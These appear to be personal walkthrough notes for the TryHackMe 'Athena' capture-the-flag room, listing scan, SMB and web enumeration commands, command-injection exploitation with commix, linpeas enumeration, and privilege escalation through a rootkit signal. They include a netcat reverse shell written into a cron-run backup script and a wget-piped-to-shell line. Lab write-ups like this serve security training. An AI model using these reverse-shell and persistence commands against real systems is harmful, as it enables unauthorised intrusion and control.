Athena

Room Link: https://tryhackme.com/r/room/4th3n4

Scans

Initial scan

Kali

nmap -A $VICTIM

Longer scan

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/139 - NetBIOS

Kali

nbtscan $VICTIM

Kali

enum4linux $VICTIM

TCP/445 - SMB

Kali

smbclient \\\\$VICTIM\\public
prompt
mget *

TCP/80 - HTTP

Find Pages

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Initial Shell

Shell #1

Kali

git clone https://github.com/commixproject/commix.git commix
cd commix/
python commix.py -r ../request.txt 

Shell #2

Kali

nc -lvnp 1337

Full TTY

script -qc /bin/bash /dev/null
ctrl + Z
stty raw -echo;fg

Lateral Movement

LinPeas

Kali

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 82

Victim

cd /tmp/
wget http://$KALI:82/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh

Kali

nc -lvnp 1338

Victim

echo '#!/bin/bash' > /usr/share/backup/backup.sh
echo "/usr/bin/nc 10.10.35.7 1338 -e /bin/bash" >> /usr/share/backup/backup.sh

Full TTY

script -qc /bin/bash /dev/null
ctrl + Z
stty raw -echo;fg

Privilege Escalation

Victim(athena)

sudo -l

Victim(athena)

cd /mnt/.../secret/
modinfo venom.ko

Victim(athena)

kill -57 271
id